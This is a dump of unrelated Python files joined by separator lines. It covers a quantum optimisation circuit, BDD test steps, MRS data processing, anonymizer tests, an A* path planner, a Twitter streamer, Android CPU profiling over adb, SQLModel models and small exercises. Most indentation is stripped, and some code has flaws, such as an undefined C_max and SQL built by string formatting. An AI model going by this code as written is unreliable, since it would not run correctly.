qc.append(const_adder_2, [qr_index[i]] + qr_data[:])
if i==0:
const_adder_1 = const_adder(data_qubits=data_qubits,const=val1).control(1)
qc.x(qr_index[i])
qc.append(const_adder_1, [qr_index[i]] + qr_data[:]) # No addition of C1 except C1[0]
qc.x(qr_index[i])
qc.append(QFT(data_qubits,inverse=True).to_gate(),qr_data) # inverse QFT needs only here
return qc.to_gate(label=" Cost Calculation ") if to_gate else qc
# penalty part
def constraint_testing(data_qubits: int, C_max: int, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_data = QuantumRegister(data_qubits, "data")
qr_f = QuantumRegister(1, "flag")
qc = QuantumCircuit(qr_data, qr_f)
# Since C_max = 2**c - 1, e.g., qr_data = xxxyyy is ok (i.e., flag=0) if all of x's are 0.
a = int(math.log(C_max,2))
qc.x(qr_data[:])
if data_qubits-a>1:
qc.mcx(qr_data[a+1:],qr_f)
qc.x(qr_f)
return qc.to_gate(label=" Constraint Testing ") if to_gate else qc
# penalty part
def penalty_dephasing(data_qubits: int, alpha: float, gamma: float, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_data = QuantumRegister(data_qubits, "data")
qr_f = QuantumRegister(1, "flag")
qc = QuantumCircuit(qr_data, qr_f)
for i in range(data_qubits):
qc.cp(2*alpha*gamma*(2**(data_qubits)-1-2**i ),qr_f,qr_data[i])
qc.p(-2*alpha*gamma*C_max,qr_f)
return qc.to_gate(label=" Penalty Dephasing ") if to_gate else qc
# penalty part
def reinitialization(index_qubits: int, data_qubits: int, C1: list, C2: list, C_max: int, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qr_data = QuantumRegister(data_qubits, "data")
qr_f = QuantumRegister(1, "flag")
qc = QuantumCircuit(qr_index, qr_data, qr_f)
qc.append(constraint_testing(data_qubits=data_qubits,C_max=C_max,to_gate=True),qr_data[:]+qr_f[:])
qc.append(cost_calculation(index_qubits=index_qubits,data_qubits=data_qubits,list1=C1,list2=C2,to_gate=True).inverse(),qr_index[:]+qr_data[:])
return qc.to_gate(label=" Reinitialization ") if to_gate else qc
### Mixing Operator ###
def mixing_operator(index_qubits: int, beta: float, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qc = QuantumCircuit(qr_index)
if beta>1e-5: # beta = 0 is identity so this reduces # of gates.
for i in range(index_qubits):
qc.rx(2*beta,i)
return qc.to_gate(label=" Mixing Operator ") if to_gate else qc
qr_index = QuantumRegister(index_qubits, "index") # index register
qr_data = QuantumRegister(data_qubits, "data") # data register
qr_f = QuantumRegister(1, "flag") # flag register
cr_index = ClassicalRegister(index_qubits,"c_index") # classical register storing the measurement result of index register
qc = QuantumCircuit(qr_index, qr_data, qr_f, cr_index)
### initialize the index register with uniform superposition state ###
qc.h(qr_index)
### DO NOT CHANGE THE CODE BELOW
p = 5
alpha = 1
for i in range(p):
### set fixed parameters for each round ###
beta = 1 - (i + 1) / p
gamma = (i + 1) / p
### return part ###
qc.append(phase_return(index_qubits, gamma, L1, L2), qr_index)
### step 1: cost calculation ###
qc.append(cost_calculation(index_qubits, data_qubits, C1, C2), qr_index[:] + qr_data[:])
### step 2: Constraint testing ###
qc.append(constraint_testing(data_qubits, C_max), qr_data[:] + qr_f[:])
### step 3: penalty dephasing ###
qc.append(penalty_dephasing(data_qubits, alpha, gamma), qr_data[:] + qr_f[:])
### step 4: reinitialization ###
qc.append(reinitialization(index_qubits, data_qubits, C1, C2, C_max), qr_index[:] + qr_data[:] + qr_f[:])
### mixing operator ###
qc.append(mixing_operator(index_qubits, beta), qr_index)
### measure the index ###
### since the default measurement outcome is shown in big endian, it is necessary to reverse the classical bits in order to unify the endian ###
qc.measure(qr_index, cr_index[::-1])
return qc
|
# -*- coding: utf-8 -*-
from lettuce import step, world
@step(u'Then I see the menu')
def then_i_see_the_menu(step):
menu_block = world.elem('.masthead')
assert menu_block.is_displayed()
@step(u'and I see auth block')
def and_i_see_auth_block(step):
auth_block = world.elem('.auth')
assert auth_block.is_displayed()
@step(u'and auth block contains facebook login')
def and_auth_block_contains_facebook_login(step):
auth_block = world.elem('.auth')
assert 'Login with Facebook' in auth_block.text
@step(u'and auth block contains google login')
def and_auth_block_contains_google_login(step):
auth_block = world.elem('.auth')
assert 'Login with Google' in auth_block.text
@step(u'and auth block contains my full name')
def and_auth_block_contains_my_full_name(step):
user = world.get_current_user()
auth_block = world.elem('.auth')
assert user.get_full_name() in auth_block.text
|
# Python modules
import os
import sys
# 3rd party modules
# Our modules
import vespa.analysis.util_import as util_import
SUPPORTED = ['wbnaa', 'siemens dicom']
DESC = \
"""Command line interface to process MRS data in Vespa-Analysis.
Data filename, preset file name, data type string and CSV output
file name values are all required for this command to function
properly.
Note. You may have to enclose data/preset/output strings in double
quotation marks for them to process properly if they have
spaces or other special characters embedded in them.
"""
def do_results(dataset, datafile, csvfile, verbose=False, debug=False):
"""
Some typical save type formats = 'svg' 'eps' 'pdf' 'png' 'raw' 'rgba' 'ps' 'pgf' etc.
Typical fontnames 'Consolas' 'Calibri' 'Courier New' 'Times New Roman'
minplot and maxplot are in PPM
"""
fpath, fname = os.path.split(datafile)
# Save results to CSV file --------------------------------------
if verbose: print(""" - saving results to CSV file "%s". """ % csvfile)
voxels = dataset.all_voxels
fit = dataset.blocks["fit"]
# FIXME - this fails if no Prep block, need a property at the dataset level?
measure_times = dataset.blocks["prep"].measure_time
lines = fit.results_as_csv_all_voxels_areas(voxels, fname, measure_times)
lines = [",".join(line) for line in lines]
lines = "\n".join(lines)
lines += '\n'
    with open(csvfile, 'a') as f:
        f.write(lines)
def _open_viff(datafile):
datasets = []
filename = datafile
timestamp = ''
msg = ""
try:
importer = util_import.DatasetCliImporter(filename)
except IOError:
msg = """I can't read the file "%s".""" % filename
except SyntaxError:
msg = """The file "%s" isn't valid Vespa Interchange File Format.""" % filename
if msg:
print(msg, file=sys.stderr)
print(msg, file=sys.stdout)
sys.exit(-1)
else:
# Time to rock and roll!
dsets, timestamp = importer.go()
for item in dsets:
datasets.append(item)
if datasets:
for dataset in datasets:
if dataset.id == datasets[-1].id:
dataset.dataset_filename = filename
# dataset.filename is an attribute set only at run-time
# to maintain the name of the VIFF file that was read in
# rather than deriving a filename from the raw data
# filenames with *.xml appended. But we need to set this
# filename only for the primary dataset, not the associated
# datasets. Associated datasets will default back to their
# raw filenames if we go to save them for any reason
else:
dataset.dataset_filename = ''
return datasets, timestamp
def main():
verbose = True
# Processing of SVS_EDIT_DIFF files
STARTDIR = 'D:\\Users\\bsoher\\temp\\current\\data'
csvfile = STARTDIR+'\\_csv_output_file_metabs.txt'
skip = ['raw_fruct-002','raw_fruct-003','raw_fruct-006','raw_fruct-011','raw_fruct-012',
'raw_fruct-016','raw_fruct-017','raw_fruct-018','raw_fruct-020','raw_fruct-021','raw_fruct-023',
'raw_fruct-025','raw_fruct-026','raw_fruct-028','raw_fruct-035','raw_fruct-046',
'raw_fruct-047','raw_fruct-048','raw_fruct-055','raw_fruct-057','raw_fruct-059',
'raw_fruct-061','_archive_results_pass1','_archive_results_pass2']
# get all paths in data directory, remove unusable datasets, convert into filenames
paths = list(filter(os.path.isdir, [os.path.join(STARTDIR,f) for f in os.listdir(STARTDIR) if f not in skip]))
datafiles = [path+'_all_files.xml' for path in paths]
for i,datafile in enumerate(datafiles):
# Load Main Dataset --------------------------
fpath, fname = os.path.split(datafile)
if verbose: print("""%s - Load Data into a Dataset object - %s""" % (str(i), fname))
datasets, _ = _open_viff(datafile)
dataset = datasets[-1]
do_results( dataset, datafile, csvfile, verbose=verbose, debug=False)
# if i >= 3: break # debug statement to exit after one file processed
bob = 10
bob += 1
if __name__ == '__main__':
main()
|
# The MIT License
# Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS)
# Copyright (c) 2017-2020 Estonian Information System Authority (RIA)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import unittest
from unittest.mock import MagicMock, Mock
from opmon_anonymizer.anonymizer import Anonymizer
ROOT_DIR = os.path.abspath(os.path.dirname(__file__))
class TestAnonymizer(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.maxDiff = None
def test_allowed_fields_parsing(self):
allowed_fields = Anonymizer._get_allowed_fields(
os.path.join(ROOT_DIR, 'data', 'test_field_translations.list'),
Mock()
)
expected_allowed_fields = ['client.requestInTs', 'producer.requestInTs', 'client.securityServerType', 'totalDuration']
self.assertCountEqual(expected_allowed_fields, allowed_fields)
def test_hiding_rules_parsing(self):
self.assertTrue(True)
def test_substitution_rules_parsing(self):
self.assertTrue(True)
def test_transformers_parsing(self):
self.assertTrue(True)
def test_field_translation_parsing(self):
anonymizer_instance = Mock()
field_translations = Anonymizer._get_field_translations(
anonymizer_instance, os.path.join(ROOT_DIR, 'data', 'test_field_translations.list'))
expected_field_translations = {
'client': {
'requestInTs': 'requestInTs',
'securityServerType': 'securityServerType',
},
'producer': {
'requestInTs': 'requestInTs',
},
'totalDuration': 'totalDuration',
}
self.assertEqual(expected_field_translations, field_translations)
def test_field_value_mask_parsing(self):
anonymizer_instance = Mock()
field_agent_masks = Anonymizer._get_field_value_masks(
anonymizer_instance, os.path.join(ROOT_DIR, 'data', 'test_field_data.yaml'))
expected_field_agent_masks = {'client': set(['producerDurationProducerView']), 'producer': set(['totalDuration'])}
self.assertEqual(expected_field_agent_masks, field_agent_masks)
# def test_last_anonymization_timestamp_storing(self):
# new_sqlite_db_path = 'temp.db'
# previous_run_manager = PreviousRunManager(new_sqlite_db_path)
#
# current_time = datetime.datetime.now().timestamp()
# previous_run_manager.set_previous_run(current_time)
#
# fetched_time = previous_run_manager.get_previous_run()
#
# self.assertEqual(current_time, fetched_time)
#
# os.remove(new_sqlite_db_path)
|
from pymatflow.abinit.group import AbinitVariableGroup
class AbinitMisc(AbinitVariableGroup):
"""
"""
def __init__(self):
super().__init__()
#self.incharge = []
self.status = True
def to_string(self, n=0):
"""
:return input_str is the string of all the set params
"""
input_str = ""
input_str += "# ============================\n"
input_str += "# miscellaneous parameters\n"
input_str += "# ============================\n"
input_str += "\n"
self.set_n(n)
input_str += super().to_string()
return input_str
#
|
import unittest
import os.path
import sys
import numpy as np
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(root_dir)
import dataset
# TO DO: Add data to lustre + gpfs for easier testing
class dataset_test(unittest.TestCase):
def test_num_train_samples(self):
#print("Testing num train samples")
self.assertEqual(dataset.num_train_samples(), 64)
def test_get_train(self):
#print("Testing get train")
for i in range(dataset.num_train_samples()):
mof = dataset.get_train(i)
self.assertIsInstance(mof, np.ndarray)
def test_sample_dims(self):
# print("Testing Sample Dims")
self.assertEqual(dataset.sample_dims()[0], dataset.get_train(0).size)
if __name__ == '__main__':
unittest.main()
|
"""
A* grid based planning
author: Atsushi Sakai(@Atsushi_twi)
Revised by Nikos Kanargias (nkana@tee.gr)
See Wikipedia article (https://en.wikipedia.org/wiki/A*_search_algorithm)
See also code of Christian Careaga (http://code.activestate.com/recipes/578919-python-a-pathfinding-with-binary-heap/)
"""
import matplotlib.pyplot as plt
import math
from operator import attrgetter
show_animation = True
class Node:
def __init__(self, x, y):
self.x = x
self.y = y
self.gscore = 0
self.fscore = 0
def __str__(self):
return str(self.x) + "," + str(self.y) + "," + str(self.fscore)
def __eq__(self, other):
"""
useful Cell equivalence
"""
if isinstance(other, self.__class__):
return self.x == other.x and self.y == other.y
else:
return False
def calc_final_path(nstart, ngoal, reso):
# generate final course
rx, ry = [ngoal.x * reso], [ngoal.y * reso]
current = ngoal
while current != nstart:
rx.append(current.x * reso)
ry.append(current.y * reso)
current = current.cameFrom
return rx, ry
def a_star_planning(sx, sy, gx, gy, ox, oy, reso, rr):
"""
gx: goal x position [m]
gx: goal x position [m]
ox: x position list of Obstacles [m]
oy: y position list of Obstacles [m]
reso: grid resolution [m]
rr: robot radius[m]
"""
nstart = Node(round(sx / reso), round(sy / reso))
ngoal = Node(round(gx / reso), round(gy / reso))
ox = [iox / reso for iox in ox]
oy = [ioy / reso for ioy in oy]
obmap, minx, miny, maxx, maxy, xw, yw = calc_obstacle_map(ox, oy, reso, rr)
motion = get_motion_model()
openset, closedset = [nstart], []
while openset:
openset.sort(key=attrgetter("fscore"))
# Remove the item with the smallest fscore value from the open set
current = openset.pop(0)
# show graph
if show_animation:
plt.plot(current.x * reso, current.y * reso, "xc")
if len(closedset) % 10 == 0:
plt.pause(0.001)
if current == ngoal:
print("Find goal")
ngoal.cameFrom = current.cameFrom
break
# Add it to the closed set
closedset.insert(0, current)
# expand search grid based on motion model
for i in range(len(motion)):
neighbor = Node(current.x + motion[i][0], current.y + motion[i][1])
# if tentative_g_score is eliminated we get the greedy algorithm instead
tentative_g_score = current.gscore + heuristic(current, neighbor)
if not verify_node(neighbor, obmap, minx, miny, maxx, maxy):
continue
if neighbor in closedset and tentative_g_score >= neighbor.gscore:
continue
if tentative_g_score < neighbor.gscore or neighbor not in openset:
neighbor.cameFrom = current
neighbor.gscore = tentative_g_score
neighbor.fscore = tentative_g_score + heuristic(neighbor, ngoal)
openset.append(neighbor)
rx, ry = calc_final_path(nstart, ngoal, reso)
return rx, ry
def heuristic(a, b):
w = 10.0 # weight of heuristic
d = w * math.sqrt((a.x - b.x)**2 + (a.y - b.y)**2)
return d
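# Note: with w > 1.0 this is a weighted heuristic (weighted A*), which usually
# expands fewer nodes but no longer guarantees an optimal path; w = 1.0 gives
# plain A* with an admissible Euclidean heuristic for this 8-connected grid.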
def verify_node(node, obmap, minx, miny, maxx, maxy):
if node.x < minx:
return False
elif node.y < miny:
return False
elif node.x >= maxx:
return False
elif node.y >= maxy:
return False
if obmap[node.x][node.y]:
return False
return True
def calc_obstacle_map(ox, oy, reso, vr):
minx = round(min(ox))
miny = round(min(oy))
maxx = round(max(ox))
maxy = round(max(oy))
# print("minx:", minx)
# print("miny:", miny)
# print("maxx:", maxx)
# print("maxy:", maxy)
xwidth = round(maxx - minx)
ywidth = round(maxy - miny)
# print("xwidth:", xwidth)
# print("ywidth:", ywidth)
# obstacle map generation
obmap = [[False for i in range(xwidth)] for i in range(ywidth)]
for ix in range(xwidth):
x = ix + minx
for iy in range(ywidth):
y = iy + miny
# print(x, y)
for iox, ioy in zip(ox, oy):
d = math.sqrt((iox - x)**2 + (ioy - y)**2)
if d <= vr / reso:
obmap[ix][iy] = True
break
return obmap, minx, miny, maxx, maxy, xwidth, ywidth
def get_motion_model():
# dx, dy, cost
motion = [[1, 0, 1],
[0, 1, 1],
[-1, 0, 1],
[0, -1, 1],
[-1, -1, math.sqrt(2)],
[-1, 1, math.sqrt(2)],
[1, -1, math.sqrt(2)],
[1, 1, math.sqrt(2)]]
return motion
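# Note: in this variant the cost column above is informational only; a_star_planning
# takes the step cost from heuristic(current, neighbor), i.e. the weighted Euclidean
# distance between adjacent cells, rather than from motion[i][2].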
def main():
print(__file__ + " start!!")
# start and goal position
sx = 10.0 # [m]
sy = 10.0 # [m]
gx = 50.0 # [m]
gy = 50.0 # [m]
grid_size = 1.0 # [m]
robot_size = 1.0 # [m]
ox, oy = [], []
for i in range(60):
ox.append(i)
oy.append(0.0)
for i in range(60):
ox.append(60.0)
oy.append(i)
for i in range(61):
ox.append(i)
oy.append(60.0)
for i in range(61):
ox.append(0.0)
oy.append(i)
for i in range(40):
ox.append(20.0)
oy.append(i)
for i in range(40):
ox.append(40.0)
oy.append(60.0 - i)
if show_animation:
plt.plot(ox, oy, ".k")
plt.plot(sx, sy, "xr")
plt.plot(gx, gy, "xb")
plt.grid(True)
plt.axis("equal")
rx, ry = a_star_planning(sx, sy, gx, gy, ox, oy, grid_size, robot_size)
if show_animation:
plt.plot(rx, ry, "-r")
plt.show()
if __name__ == '__main__':
main()
|
"""
stream tweets to database driver and stdout
"""
import logging
import signal
import sys
import tweepy
from urllib3.exceptions import ProtocolError
from tweepy.streaming import StreamListener
import config as c
import utils
class StdOutListener(StreamListener):
"""
listener, resposible for receiving data
"""
def __init__(self, database):
super(StdOutListener, self).__init__()
self.database = database
def on_status(self, status):
"""
a twitter status has been recieved
"""
tweet_url = (
"http://twitter.com/" + status.user.screen_name + "/status/" + status.id_str
)
logging.info(f"TWEET: {tweet_url}\n{status.text}")
self.database.saveTweet(tweet_url, status)
self.database.saveAuthor(status)
def on_error(self, status):
"""
error handler
"""
logging.error(status)
def run():
"""
main entry point
"""
opts = c.parse_args([c.CONFIG_FILE, c.DEBUG, c.IDS, c.USERS, c.DBS, c.TERMS])
database = opts.db
config = opts.config[0]
    logging.debug("ids: %s", opts.ids)
if opts.ids:
ids = [str(i[1]) for i in opts.ids]
else:
ids = None
stream_config = {
"follow": ids,
"track": opts.track or None
}
listener = StdOutListener(database)
api = utils.twitter_login(config)
def signal_handler(*argv, **argh):
database.close()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
    stream = tweepy.Stream(auth=api.auth, listener=listener)
logging.info(f"STREAM: {stream_config}")
while True:
try:
stream.filter(**stream_config)
except ProtocolError:
pass
if __name__ == "__main__":
run()
|
import ApplicationPerformance.applicationperformance.launchTime as launchTime  # macOS
#import ApplicationPerformance.applicationperformance.launchTime as launchTime  # Windows: import the applicationperformance.launchTime module and rename it to launchTime
import ApplicationPerformance.applicationfunction.functionAutomation as functionAutomation
import os
import time
import platform
class CpuApplicationData(object):
    # Determine the current operating system
def receiveSystomInfo(self):
return platform.system()
    # Run the command that collects the CPU usage percentage
def receiveCpuDataCmd(self, searchkey, devicesid):
if "Windows" in CpuApplicationData().receiveSystomInfo(): # Windows系统
if devicesid != "":
receivecpucmd = "adb.exe -s %s shell dumpsys cpuinfo | find \"%s\"" % (devicesid, searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
while "\n" in cpudatas:
cpudatas.remove("\n")
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
else:
receivecpucmd = "adb.exe shell dumpsys cpuinfo | find \"%s\"" % (searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
while "\n" in cpudatas:
cpudatas.remove("\n")
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
elif "Darwin" in CpuApplicationData().receiveSystomInfo(): # Mac系统
if devicesid != "":
receivecpucmd = "adb -s %s shell dumpsys cpuinfo | grep %s" % (devicesid, searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
else:
receivecpucmd = "adb shell dumpsys cpuinfo | grep %s" % (searchkey)
cpuproportion = 0
receivecpudata = os.popen(receivecpucmd)
cpudatas = [i for i in receivecpudata]
for cpuproportiondatas in cpudatas:
cpuproportiondata = float(cpuproportiondatas.split('%')[0])
cpuproportion = cpuproportion + cpuproportiondata
return str(cpuproportion) + '%'
else:
print("当前系统环境无法识别,请使用Mac或Windows系统")
    # Run the monkey script
def monkeyRun(self, monkeyscript):
monkeycmd = os.popen(monkeyscript)
    # Stop the running monkey process
def Stopmonkey(self, devicesid):
if "Windows" in CpuApplicationData().receiveSystomInfo(): # Windows系统
if devicesid != "":
executecmd = [i for i in os.popen("adb -s %s shell ps | find \"monkey\"" % (devicesid))]
while "\n" in executecmd:
executecmd.remove("\n")
stopmonkeycmd = executecmd[0].split()[1]
os.popen("adb -s %s shell kill -9 %s" % (devicesid, stopmonkeycmd))
else:
executecmd = [i for i in os.popen("adb shell ps | find \"monkey\"")]
while "\n" in executecmd:
executecmd.remove("\n")
stopmonkeycmd = executecmd[0].split()[1]
os.popen("adb shell kill -9 %s" % (stopmonkeycmd))
elif "Darwin" in CpuApplicationData().receiveSystomInfo(): # Mac系统
if devicesid != "":
for i in os.popen("adb -s %s shell ps | grep monkey" % (devicesid)):
stopmonkeycmd = i.split()[1]
os.popen("adb -s %s shell kill -9 %s" % (devicesid, stopmonkeycmd))
else:
for i in os.popen("adb shell ps | grep monkey"):
stopmonkeycmd = i.split()[1]
os.popen("adb shell kill -9 %s" % (stopmonkeycmd))
else:
if devicesid != "":
for i in os.popen("adb -s %s shell ps | grep monkey" % (devicesid)):
stopmonkeycmd = i.split()[1]
os.popen("adb -s %s shell kill -9 %s" % (devicesid, stopmonkeycmd))
else:
for i in os.popen("adb shell ps | grep monkey"):
stopmonkeycmd = i.split()[1]
os.popen("adb shell kill -9 %s" % (stopmonkeycmd))
    # Collect CPU data and save it
def receiveCpuData(self):
caserows = launchTime.ReadExcel().readeExcelData('cpudata')
eventid = time.strftime('%Y%m%d%H%M%S', time.localtime())
for i in range(1, caserows.get('caserows')):
casedata = caserows.get('excledata_sheel').row_values(i)
caseid = int(casedata[0])
packactivity = casedata[1]
packname = casedata[2]
searchkey = casedata[3]
if searchkey == "":
print("执行命令的搜索字为空,请检查excel表格D1列")
monkeyscript = casedata[4]
functionscript = casedata[5]
count = int(casedata[6])
intervaltime = int(casedata[7])
devicesid = casedata[8]
executestatus = casedata[9]
returndata = caseid, packname, monkeyscript, functionscript, count, intervaltime, devicesid, executestatus
if 'Y' in executestatus:
if count > 0:
print("执行用例编号:%s,用例数据为:%s" % (caseid, returndata))
if monkeyscript != "":
runnumber = 1
                        CpuApplicationData().monkeyRun(monkeyscript)  # run the monkey script
                        cpuproportions = ""  # accumulates the CPU values sampled while the monkey script runs
while count > 0:
startruntime = time.time()
cpuproportion = CpuApplicationData().receiveCpuDataCmd(searchkey, devicesid)
cpuproportions = cpuproportions + cpuproportion + ","
endruntime = time.time()
runtime = int(str(endruntime - startruntime).split(".")[1][0:4])
runtimes = endruntime - startruntime
time.sleep(intervaltime)
count -= 1
print("用例编号:%s,第%s次执行,执行时间为:%s ms,执行结果为:%s" % (caseid, runnumber, runtime, cpuproportion))
runnumber += 1
                        if cpuproportions.endswith(','):  # strip the trailing comma from the cpuproportions string
cpuproportions = cpuproportions.rstrip(',')
savedata = "insert into automationquery_automation_cpu_app (`cpuproportion`,`starttime`,`endtime`,`monkeyscript`,`functionscript`,`createdtime`,`updatetime`,`caseid`,`runtime`,`eventid`)VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
cpuproportions, startruntime, endruntime, monkeyscript, functionscript,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), caseid, runtimes, eventid)
launchTime.MysqlConnect().saveDatatoMysql("%s" % (savedata))
                        CpuApplicationData().Stopmonkey(devicesid)  # stop the monkey script
                    elif functionscript != "":
                        functionAutomation.FunctionAutomation().runTestCase("open")  # run the automated test case
runnumber = 1
while count > 0:
startruntime = time.time()
cpuproportion = CpuApplicationData().receiveCpuDataCmd(searchkey, devicesid)
endruntime = time.time()
runtime = int(str(endruntime - startruntime).split(".")[1][0:4])
runtimes = endruntime - startruntime
savedata = "insert into automationquery_automation_cpu_app (`cpuproportion`,`starttime`,`endtime`,`monkeyscript`,`functionscript`,`createdtime`,`updatetime`,`caseid`,`runtime`,`eventid`)VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
cpuproportion, startruntime, endruntime, monkeyscript, functionscript,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), caseid, runtimes, eventid)
launchTime.MysqlConnect().saveDatatoMysql("%s" % (savedata))
print("用例编号:%s,第%s次执行,执行时间为:%s ms,执行结果为:%s" % (caseid, runnumber, runtime, cpuproportion))
time.sleep(intervaltime)
count -= 1
runnumber += 1
else:
launchTime.LaunchApplication().coolLaunch(packactivity, devicesid)
runnumber = 1
while count > 0:
startruntime = time.time()
cpuproportion = CpuApplicationData().receiveCpuDataCmd(searchkey, devicesid)
endruntime = time.time()
runtime = int(str(endruntime - startruntime).split(".")[1][0:4])
runtimes = endruntime - startruntime
savedata = "insert into automationquery_automation_cpu_app (`cpuproportion`,`starttime`,`endtime`,`monkeyscript`,`functionscript`,`createdtime`,`updatetime`,`caseid`,`runtime`,`eventid`)VALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
cpuproportion, startruntime, endruntime, monkeyscript, functionscript,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), caseid, runtimes, eventid)
launchTime.MysqlConnect().saveDatatoMysql("%s" % (savedata))
print("用例编号:%s,第%s次执行,执行时间为:%s ms,执行结果为:%s" % (caseid, runnumber, runtime, cpuproportion))
time.sleep(intervaltime)
count -= 1
runnumber += 1
                else:
                    print("Case ID: %s, run count is 0, so the case is skipped; case data: %s" % (caseid, returndata))
            elif 'N' in executestatus:
                print("Case ID: %s, execution status is NO, so the case is skipped; case data: %s" % (caseid, returndata))
            else:
                print("Case ID: %s, the case was not executed; please check whether its status is Yes or No. Case data: %s" % (caseid, returndata))
if __name__ == "__main__":
CpuApplicationData().receiveCpuData()
|
from typing import List, Optional
from sqlalchemy import UniqueConstraint
from sqlalchemy.orm import relationship
from sqlmodel import Field, Relationship, SQLModel
from sb_backend.app.models.base.base_model import TimeStampMixin
class NoSeriesBase(SQLModel):
"""«No. Series» («Серия Номеров»)"""
code: str = Field(max_length=20, nullable=False, default="")
description: str = Field(max_length=100)
date_order: bool = False
noserieslines: List["NoSeriesLine"] = Relationship(
sa_relationship_kwargs=relationship(
"NoSeriesLine", cascade="all, delete, delete-orphan", back_populates="series_no", passive_deletes=True
),
)
noseriessetup: List["NoSeriesSetup"] = Relationship(back_populates="setup_series_no")
class NoSeries(NoSeriesBase, TimeStampMixin, table=True):
"""«No. Series» («Серия Номеров»)"""
__tablename__ = "no_series"
__table_args__ = (UniqueConstraint("code"),)
id: Optional[int] = Field(default=None, primary_key=True)
def __repr__(self):
return f'<NoSeries({self.code})>'
class NoSeriesCreate(NoSeriesBase):
"""«No. Series» («Серия Номеров»)"""
code: str
class NoSeriesRead(NoSeriesBase):
"""«No. Series» («Серия Номеров»)"""
id: int
# noserieslines: Optional[NoSeriesLine]
class NoSeriesUpdate(SQLModel):
"""«No. Series» («Серия Номеров»)"""
code: str
description: Optional[str]
date_order: Optional[bool] = False
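# Minimal usage sketch (illustrative only; assumes a configured SQLModel engine
# called `engine` exists elsewhere in the project):
#
#     from sqlmodel import Session
#
#     with Session(engine) as session:
#         series = NoSeries(code="SALES", description="Sales invoices", date_order=True)
#         session.add(series)
#         session.commit()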
|
from .controller import Controller # noqa: F401
|
# Create a function that lets the user enter
# integers... and strings...
# 1- print -> prints the list built up so far...
# 2- append a -> where a is an integer
# 3- remove b -> where b is an integer
# 4- sort
# 5- reverse
# 6- insert c d -> where both are integers, c being the index and d the value
# 7- exit -> ends the program
isRunning = True
myList = []
while isRunning:
userInput = input("Ingrese comando: ")
command = userInput.split()
if command[0] == "exit":
isRunning = False
elif command[0] == "append":
        # We should perhaps validate the input
argumentos = command[1]
if argumentos.isdigit():
myList.append(int(argumentos))
elif command[0] == "print":
print(myList)
elif command[0] == "sort":
myList.sort()
elif command[0] == "insert":
myList.insert(int(command[1]),int(command[2]))
#print("Se agrego",command[2],"en el indice",command[1])
# In JavaScript we had arrow functions, which were anonymous
#myFuncion = (x) => x**2
myFuncion = lambda x: x**2
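# Quick illustration of the lambda above: myFuncion(4) returns 16, and it is
# equivalent to: def myFuncion(x): return x ** 2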
|
#!/usr/bin/env python
# Find the sum of all the numbers that can be written
# as the sum of fifth powers of their digits.
# n = d-digits, sum(n) <= d*9^5 = 59049d, n >= 10^(d-1),
# so sum(n) = n implies 10*(9**5 d) >= 10**d,
# ln(10 * 9**5) + ln(d) >= d ln(10), so d <= 6
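# Quick arithmetic check of that bound (illustration only):
#   d = 6: 6 * 9**5 = 354294 >= 10**5 = 100000   -> 6-digit solutions still possible
#   d = 7: 7 * 9**5 = 413343 <  10**6 = 1000000  -> impossible, so search up to 999999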
from python.decorators import euler_timer
def sum_of_digits_powers(n, power):
return sum(int(dig) ** power for dig in str(n))
def main(verbose=False):
valid = [i for i in xrange(2, 999999 + 1)
if sum_of_digits_powers(i, 5) == i]
if verbose:
return '%s.\nThe numbers satisfying this property are: %s.' % (
sum(valid), ', '.join(str(num) for num in valid))
else:
return sum(valid)
if __name__ == '__main__':
print euler_timer(30)(main)(verbose=True)
|
"""
ImagePredictor
Image predictor abstract class
"""
class ImagePredictor(object):
""" Class that gives abstract definition of a prediction engine.
